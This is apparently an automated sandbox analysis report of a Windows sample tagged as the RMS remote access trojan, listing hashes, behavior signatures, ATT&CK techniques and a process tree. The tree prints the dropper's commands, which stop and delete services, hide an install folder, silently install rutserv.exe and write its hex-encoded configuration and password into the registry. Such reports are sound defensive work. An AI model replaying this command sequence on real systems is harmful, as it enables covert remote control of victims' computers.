rms | e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe

Analysis

max time kernel
146s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27-11-2022 19:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe
Size

4.1MB
MD5

eae75b37854b85772f17ac14433d1c9c
SHA1

548cdfc98868615232033618b6bd926c20e25acd
SHA256

e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe
SHA512

3b234d252a479940a8f9b2171a59eb90e927db671ffc5bcffec925ec07ca410f050929ebb2c232cda3aca1752542e1d3ca67a70f17c2ee0f0498812c30aae512
SSDEEP

98304:VgwRVwrPDPnWKw6ki4JNHrotxdJP2jTqmuX3O2HChZy7hx:VgCIu5cUpoXdJuSmyOXo7b

Score

10^/10

rms evasion rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Executes dropped EXE 8 IoCs

Processes:

data.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exerfusclient.exe

pid process

1376 data.exe
3476 rutserv.exe
4404 rutserv.exe
4348 rutserv.exe
3392 rutserv.exe
532 rfusclient.exe
1112 rfusclient.exe
3432 rfusclient.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4612 attrib.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1376	data.exe
3476	rutserv.exe
4404	rutserv.exe
4348	rutserv.exe
3392	rutserv.exe
532	rfusclient.exe
1112	rfusclient.exe
3432	rfusclient.exe

pid	process
4612	attrib.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe	upx
C:\Windows\spom\rfusclient.exe	upx
C:\Windows\spom\rfusclient.exe	upx
C:\Windows\spom\rfusclient.exe	upx
behavioral2/memory/532-183-0x0000000000400000-0x0000000000AE6000-memory.dmp	upx
behavioral2/memory/1112-184-0x0000000000400000-0x0000000000AE6000-memory.dmp	upx
C:\Windows\spom\rfusclient.exe	upx
behavioral2/memory/3432-187-0x0000000000400000-0x0000000000AE6000-memory.dmp	upx
behavioral2/memory/532-188-0x0000000000400000-0x0000000000AE6000-memory.dmp	upx
behavioral2/memory/1112-189-0x0000000000400000-0x0000000000AE6000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

data.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA data.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	data.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\data.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\data.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\hide.exe	autoit_exe

Drops file in Windows directory 64 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Windows\spom\dd_vcredistUI4F1D.txt	cmd.exe
File created	C:\Windows\spom\nouac.cmd	cmd.exe
File opened for modification	C:\Windows\spom\rutserv.exe	cmd.exe
File opened for modification	C:\Windows\spom\StructuredQuery.log	cmd.exe
File created	C:\Windows\spom\wctC61E.tmp	cmd.exe
File created	C:\Windows\spom\AdobeSFX.log	cmd.exe
File opened for modification	C:\Windows\spom\data.exe	cmd.exe
File created	C:\Windows\spom\GBQHURCC-20220812-1921.log	cmd.exe
File opened for modification	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_191538705.html	cmd.exe
File opened for modification	C:\Windows\spom\wmsetup.log	cmd.exe
File created	C:\Windows\spom\684259a6-0175-4108-a860-699cb31f63c2.tmp	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistUI4F1D.txt	cmd.exe
File created	C:\Windows\spom\webmmux.dll	cmd.exe
File opened for modification	C:\Windows\spom\0d502779-c529-4ae0-a0cb-e70926e21349.tmp	cmd.exe
File opened for modification	C:\Windows\spom\hide.exe	cmd.exe
File created	C:\Windows\spom\wct1510.tmp	cmd.exe
File opened for modification	C:\Windows\spom\514c4da3-c1a5-46c5-8d2b-306ae49d7593.tmp	cmd.exe
File opened for modification	C:\Windows\spom\chrome_installer.log	cmd.exe
File opened for modification	C:\Windows\spom\nouac.cmd	cmd.exe
File created	C:\Windows\spom\vp8encoder.dll	cmd.exe
File created	C:\Windows\spom\webmvorbisencoder.dll	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistMSI4F4B.txt	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI4F4B.txt	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistMSI4F1D.txt	cmd.exe
File opened for modification	C:\Windows\spom\rfusclient.exe	cmd.exe
File opened for modification	C:\Windows\spom\webmvorbisdecoder.dll	cmd.exe
File created	C:\Windows\spom\514c4da3-c1a5-46c5-8d2b-306ae49d7593.tmp	cmd.exe
File opened for modification	C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt	cmd.exe
File opened for modification	C:\Windows\spom\GBQHURCC-20220812-1921.log	cmd.exe
File opened for modification	C:\Windows\spom\msedge_installer.log	cmd.exe
File created	C:\Windows\spom\rfusclient.exe	cmd.exe
File created	C:\Windows\spom\StructuredQuery.log	cmd.exe
File created	C:\Windows\spom\uac.cmd	cmd.exe
File opened for modification	C:\Windows\spom\vp8encoder.dll	cmd.exe
File created	C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistUI4F4B.txt	cmd.exe
File opened for modification	C:\Windows\spom\wct8E36.tmp	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI4F1D.txt	cmd.exe
File created	C:\Windows\spom\hide.exe	cmd.exe
File created	C:\Windows\spom\rutserv.exe	cmd.exe
File opened for modification	C:\Windows\spom\wctC61E.tmp	cmd.exe
File created	C:\Windows\spom\aria-debug-4640.log	cmd.exe
File created	C:\Windows\spom\chrome_installer.log	cmd.exe
File opened for modification	C:\Windows\spom\jawshtml.html	cmd.exe
File opened for modification	C:\Windows\spom\vp8decoder.dll	cmd.exe
File opened for modification	C:\Windows\spom\adc52f94-c82e-434e-9f30-9b348375f053.tmp	cmd.exe
File opened for modification	C:\Windows\spom\JavaDeployReg.log	cmd.exe
File created	C:\Windows\spom\JavaDeployReg.log	cmd.exe
File opened for modification	C:\Windows\spom\jusched.log	cmd.exe
File created	C:\Windows\spom\wct4E2A.tmp	cmd.exe
File opened for modification	C:\Windows\spom\webmmux.dll	cmd.exe
File created	C:\Windows\spom\webmvorbisdecoder.dll	cmd.exe
File created	C:\Windows\spom\a6b75105-7dc9-45ac-b70c-19519ab6d538.tmp	cmd.exe
File opened for modification	C:\Windows\spom\AdobeSFX.log	cmd.exe
File opened for modification	C:\Windows\spom\BroadcastMsg_1660332030.txt	cmd.exe
File opened for modification	C:\Windows\spom\uac.cmd	cmd.exe
File created	C:\Windows\spom\vp8decoder.dll	cmd.exe
File opened for modification	C:\Windows\spom\wct399A.tmp	cmd.exe
File opened for modification	C:\Windows\spom\wct4E2A.tmp	cmd.exe
File opened for modification	C:\Windows\spom	attrib.exe
File created	C:\Windows\spom\0d502779-c529-4ae0-a0cb-e70926e21349.tmp	cmd.exe
File opened for modification	C:\Windows\spom\GBQHURCC-20220812-1921a.log	cmd.exe
File created	C:\Windows\spom\jusched.log	cmd.exe
File created	C:\Windows\spom\msedge_installer.log	cmd.exe

Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

1044 sc.exe
5036 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs net.exe

pid	process
1044	sc.exe
5036	sc.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

rutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exe

pid	process
3476	rutserv.exe
3476	rutserv.exe
3476	rutserv.exe
3476	rutserv.exe
3476	rutserv.exe
3476	rutserv.exe
4404	rutserv.exe
4404	rutserv.exe
4348	rutserv.exe
4348	rutserv.exe
3392	rutserv.exe
3392	rutserv.exe
3392	rutserv.exe
3392	rutserv.exe
3392	rutserv.exe
3392	rutserv.exe
532	rfusclient.exe
532	rfusclient.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

rfusclient.exe

pid process

3432 rfusclient.exe

pid	process
3432	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

rutserv.exerutserv.exerutserv.exe

description	pid	process
Token: SeDebugPrivilege	3476	rutserv.exe
Token: SeDebugPrivilege	4348	rutserv.exe
Token: SeTakeOwnershipPrivilege	3392	rutserv.exe
Token: SeTcbPrivilege	3392	rutserv.exe
Token: SeTcbPrivilege	3392	rutserv.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

data.exe

pid process

1376 data.exe
1376 data.exe
1376 data.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

data.exe

pid process

1376 data.exe
1376 data.exe
1376 data.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

rutserv.exerutserv.exerutserv.exerutserv.exe

pid process

3476 rutserv.exe
4404 rutserv.exe
4348 rutserv.exe
3392 rutserv.exe

pid	process
1376	data.exe
1376	data.exe
1376	data.exe

pid	process
1376	data.exe
1376	data.exe
1376	data.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exedata.execmd.exenet.exenet.exerutserv.exe

description	pid	process	target process
PID 1500 wrote to memory of 1376	1500	e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe	data.exe
PID 1500 wrote to memory of 1376	1500	e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe	data.exe
PID 1500 wrote to memory of 1376	1500	e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe	data.exe
PID 1500 wrote to memory of 2112	1500	e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe	cmd.exe
PID 1500 wrote to memory of 2112	1500	e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe	cmd.exe
PID 1500 wrote to memory of 2112	1500	e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe	cmd.exe
PID 1376 wrote to memory of 4532	1376	data.exe	cmd.exe
PID 1376 wrote to memory of 4532	1376	data.exe	cmd.exe
PID 1376 wrote to memory of 4532	1376	data.exe	cmd.exe
PID 4532 wrote to memory of 308	4532	cmd.exe	net.exe
PID 4532 wrote to memory of 308	4532	cmd.exe	net.exe
PID 4532 wrote to memory of 308	4532	cmd.exe	net.exe
PID 308 wrote to memory of 4040	308	net.exe	net1.exe
PID 308 wrote to memory of 4040	308	net.exe	net1.exe
PID 308 wrote to memory of 4040	308	net.exe	net1.exe
PID 4532 wrote to memory of 1820	4532	cmd.exe	net.exe
PID 4532 wrote to memory of 1820	4532	cmd.exe	net.exe
PID 4532 wrote to memory of 1820	4532	cmd.exe	net.exe
PID 1820 wrote to memory of 2888	1820	net.exe	net1.exe
PID 1820 wrote to memory of 2888	1820	net.exe	net1.exe
PID 1820 wrote to memory of 2888	1820	net.exe	net1.exe
PID 4532 wrote to memory of 1044	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 1044	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 1044	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 5036	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 5036	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 5036	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 1420	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 1420	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 1420	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4612	4532	cmd.exe	attrib.exe
PID 4532 wrote to memory of 4612	4532	cmd.exe	attrib.exe
PID 4532 wrote to memory of 4612	4532	cmd.exe	attrib.exe
PID 4532 wrote to memory of 3476	4532	cmd.exe	rutserv.exe
PID 4532 wrote to memory of 3476	4532	cmd.exe	rutserv.exe
PID 4532 wrote to memory of 3476	4532	cmd.exe	rutserv.exe
PID 4532 wrote to memory of 4404	4532	cmd.exe	rutserv.exe
PID 4532 wrote to memory of 4404	4532	cmd.exe	rutserv.exe
PID 4532 wrote to memory of 4404	4532	cmd.exe	rutserv.exe
PID 4532 wrote to memory of 3196	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 3196	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 3196	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4208	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4208	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4208	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2248	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2248	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2248	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4244	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4244	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4244	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 1748	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 1748	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 1748	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2656	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2656	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2656	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2292	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2292	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2292	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4348	4532	cmd.exe	rutserv.exe
PID 4532 wrote to memory of 4348	4532	cmd.exe	rutserv.exe
PID 4532 wrote to memory of 4348	4532	cmd.exe	rutserv.exe
PID 3392 wrote to memory of 532	3392	rutserv.exe	rfusclient.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4612 attrib.exe

pid	process
4612	attrib.exe

C:\Users\Admin\AppData\Local\Temp\e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe
"C:\Users\Admin\AppData\Local\Temp\e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1500

C:\Users\Admin\AppData\Local\Temp\data.exe
"C:\Users\Admin\AppData\Local\Temp\data.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nouac.cmd
3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4532

C:\Windows\SysWOW64\net.exe
net stop netaservice
4⤵
- Suspicious use of WriteProcessMemory
PID:308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop netaservice
5⤵
PID:4040

C:\Windows\SysWOW64\net.exe
net stop rmanservice
4⤵
- Suspicious use of WriteProcessMemory
PID:1820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop rmanservice
5⤵
PID:2888

C:\Windows\SysWOW64\sc.exe
sc delete netaservice
4⤵
- Launches sc.exe
PID:1044

C:\Windows\SysWOW64\sc.exe
sc delete rmanservice
4⤵
- Launches sc.exe
PID:5036

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
4⤵
PID:1420

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Windows\spom"
4⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:4612

C:\Windows\spom\rutserv.exe
"rutserv.exe" /silentinstall
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3476

C:\Windows\spom\rutserv.exe
"rutserv.exe" /firewall
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4404

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600310030003000330022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e0065006600770066006500660073006500660040006d00610069006c002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00440045003600300041003100380035002d0046003800310043002d0034004400310039002d0042003000440036002d003500350033003300320037003300390046004400320044007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360031003000300033003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a00
4⤵
PID:3196

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
4⤵
PID:4208

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400
4⤵
PID:2248

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00
4⤵
PID:4244

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323030392e37343435313730303233084c6963656e73657306ae524d532d462d62366665664645334436363231346539363944333744396163653235423032366269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c46564467594841514271664738645556554f446c5246446d42346667494e4841494341514a76594878704141734c4141734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f6465536574080000
4⤵
PID:1748

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"
4⤵
PID:2656

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
4⤵
PID:2292

C:\Windows\spom\rutserv.exe
"rutserv.exe" /start
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
2⤵
PID:2112

C:\Windows\spom\rutserv.exe
C:\Windows\spom\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3392

C:\Windows\spom\rfusclient.exe
C:\Windows\spom\rfusclient.exe /tray
2⤵
- Executes dropped EXE
PID:1112

C:\Windows\spom\rfusclient.exe
C:\Windows\spom\rfusclient.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:532

C:\Windows\spom\rfusclient.exe
C:\Windows\spom\rfusclient.exe /tray
3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:3432

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
Filesize
300B

MD5
ad4e1f735a6dc6186785994664e4a6ca

SHA1
abb665a10047585838e600ed4d2e3fb23314698c

SHA256
0e6f1b05360848a0cea7dcc9a8bdf33d678ba69ad0ab646fbfbc265263eca662

SHA512
ae0e9ebde76b56c6d1fe5f92996b723a7a9fbf4b134a430fb315c6fe057b0075cc63c39fc589d1b051223dbe03bb27791bb9353d92ef2bf95b580eded037365d

Download Submit
C:\Users\Admin\AppData\Local\Temp\data.exe
Filesize
819KB

MD5
71a944406c89ab321cb1e55c37916d70

SHA1
be6ee2015475bdc1a665b1e6b86e86fcc1025c91

SHA256
4f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96

SHA512
9ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda

Download Submit
C:\Users\Admin\AppData\Local\Temp\data.exe
Filesize
819KB

MD5
71a944406c89ab321cb1e55c37916d70

SHA1
be6ee2015475bdc1a665b1e6b86e86fcc1025c91

SHA256
4f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96

SHA512
9ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda

Download Submit
